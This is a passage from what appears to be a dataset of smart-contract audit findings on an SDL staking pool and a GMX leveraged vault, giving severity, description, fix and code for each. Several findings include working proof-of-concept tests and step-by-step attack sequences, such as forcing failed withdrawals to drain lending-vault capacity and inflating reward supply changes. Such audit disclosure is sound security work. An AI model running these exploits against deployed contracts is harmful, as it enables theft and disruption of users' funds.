int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);\\n\\n if (baseAmountDiff < 0) {\\n // rest of code\\n } else if (boostAmountDiff < 0) {\\n locks[lockId].expiry = updateLockState.expiry;\\n locks[lockId].boostAmount = 0;\\n emit InitiateUnlock(_owner, lockId, updateLockState.expiry);\\n } else {\\n // rest of code\\n }\\n // rest of code\\n}\\n// rest of code\\n```\\n\\nRecall that the attacker only has a single update, with the only difference being the decrease of 50 for the `boostAmount`. 
This will trigger the logic based on the `boostAmountDiff < 0` statement which will set `locks[lockId].boostAmount = 0`. This is clearly incorrect logic & will allow the attacker to then fraudulently increase `queuedRESDLSupplyChange`, which will ultimately lead to more rewards going to this secondary chain.\\nContinuing this attack, the attacker will again call `SDLPoolSecondary:extendLockDuration`, but this time with a `_lockingDuration` of 10_000. Referencing the same code snippet as earlier, in `_updateLock`, `boostAmount` is now being calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated to be: (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:\\n```\\nqueuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n```\\n\\nRecall that this value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` function call. Ultimately, in aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the update, there would be 0 change in the `queuedRESDLSupplyChange`.\\nThe fundamental bug here is that post a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to be able to increase `queuedRESDLSupplyChange` more than should be possible, & `queuedRESDLSupplyChange` is a major factor in terms of the percentage of rewards going to a given secondary chain.",The `_executeQueuedLockUpdates` function implicitly assumes if there's a decrease in `boostAmountDiff` then the lock update comes from calling `initiateUnlock`. 
There needs to be an additional case to handle this scenario due to a decrease in the `maxBoost`.,"Users with existing reSDL NFTs on secondary chains (prior to a decrease in the maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.","```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n" +Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary pool,low,"The SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are not rewards to distribute in a specific `secondary chain` causing that queue updates from the `secondarly chain` will not be informed to the `SDLPoolPrimary`.\\nThe `secondary chain` informs to the `primary chain` the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. 
Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. 
This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receive rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` so that `shouldUpdate` is true and the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. 
However, in certain circumstances it is possible that the `secondary chain` may never be able to send information to the `primary chain` since there may not be any rewards for the `secondary chain`. Please consider the next scenario:\\n`UserA` stakes directly in the `secondary chain` and the queuedRESDLSupplyChange increments\\nThe increase in supply CANNOT be reported to the `primary chain` since `shouldUpdate = false` and the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nRewards are calculated on the `primary chain`, however because the `secondary chain` has not been able to send the new supply information, zero rewards reSDLSupplyByChain will be calculated for the `secondary chain` since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate=True`, therefore the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool` however SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep ""codehawks performUpkeep reverts""\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. 
Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\n","Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function may check if the `secondary pool` has new information and so do not wait for rewards to be available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n","`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.\\nTools used\\nManual review","```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += 
uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n" +depositors face immediate loss in case `equity = 0`,medium,"The vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses, users receive disproportionately low shares, and take a loss Immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`. and we can see that here :\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. 
The equity value can become zero due to various factors such as strategy losses or accumulated lending interests... ect\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nthe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value,\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to 0.001 USD. `100 * 100 * 1e18 / 1,000,000 = 0.001 USD` (value * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with these old minted shares and loses their deposit, whereas those old shares should be liquidated some how.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.",use a liquidation mechanism that burns the shares of all users when equity drops to zero.,users face immediate loss of funds in case equity drops to zero,"```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n" +incorrect handling of compound 
cancelation lead vault to stuck at `compound_failed` status,medium,"the compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit get cancelled, the contract enters a `compound_failed` status. leading to a deadlock and preventing further protocol interactions.\\n-The `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop as sponsor said) for TokenA or TokenB. Initially, it exchanges this token for either tokenA or tokenB and sets the status to `compound`. Then, it adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n 
/// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract will set the status to `open` again. However, if the deposit is cancelled, the callback will call `processCompoundCancellation()` function and the status will be set to `compound_failed` as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled, and the status becomes `compound_failed`. In this scenario, only the compound function can be called again and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (Because we successfully create a deposit in `GMX` that means the swap was successfull). Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. 
If keeper continue to call this function, no progress will be made, only gas will be wasted. Furthermore, all interactions with the protocol are impossible since the status is `compound_failed`.",incorrect handling of compound cancelation lead vault to stuck at `compound_failed` status\\nin the event of a deposit get cancelled when trying to compound. just add liquidity again without the swapping logic.,strategy vault stuck at `compond_failed` status. prevent any interaction with the protocol\\nkeeper may waste a lot of gas trying to handle this situation .,"```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? 
zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n" +The protocol will mint unnecessary fees if the vault is paused and reopened later.,medium,"Unnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5(this can be more) wei(gvToken) for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of lp tokens minted as a fee will be 50000000 wei in terms of `gvToken`. 
This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues, and then the vault is reopened, let's say after 1 month of being paused, the time difference from `block.timestamp - _secondsFromLastCollection` will be = 2630000s\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 1315000000000\\nThis is an unnecessary fee generated for the treasury because the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.","If the vault is being reopened, there should be a function to override the _store.lastFeeCollected = block.timestamp; with block.timestamp again.","This will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.",```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n +`emergencyPause` does not check the state before running && can cause loss of funds for users,medium,"The `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. 
In some cases this could result in financial loss for users if the function is executed before the callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution before callbacks execution. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose his funds as he will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, when the callback from GMX executes the `afterDepositExecution` nothing will happen since the conditions are not met. Which means that any deposit amount will not be met by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the 
conditions are not met\\n }\\n```\\n\\nIf by any chance, the `processDeposit` function is executed (or any other function from the callback) it will still revert in the beforeChecks (like the beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n","To mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.","If the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to potential for funds to be stuck without recourse.\\nPOC :\\nYou can copy this test in the file GMXEmergencyTest.t.sol then execute the test with the command forge test --mt\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, 
wethBalanceBefore - 10 ether);\\n\\n }\\n```\\n","```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n" +try-catch does not store the state when it is reverted,high,"If a withdrawal from GMX is successful without any errors, the borrowed amount is repayed to the lending vaults within a try-catch block within the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reseted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. 
In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n 
//User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. 
(Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(""DebtAmtBefore: %s"", debtAmtTokenBBefore);\\n console.log(""DebtAmtAfter: %s"", debtAmtTokenBAfter);\\n console.log(""leverageBefore: %s"", leverageBefore);\\n console.log(""leverageAfter: %s"", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`","In processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deleted","Users can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from 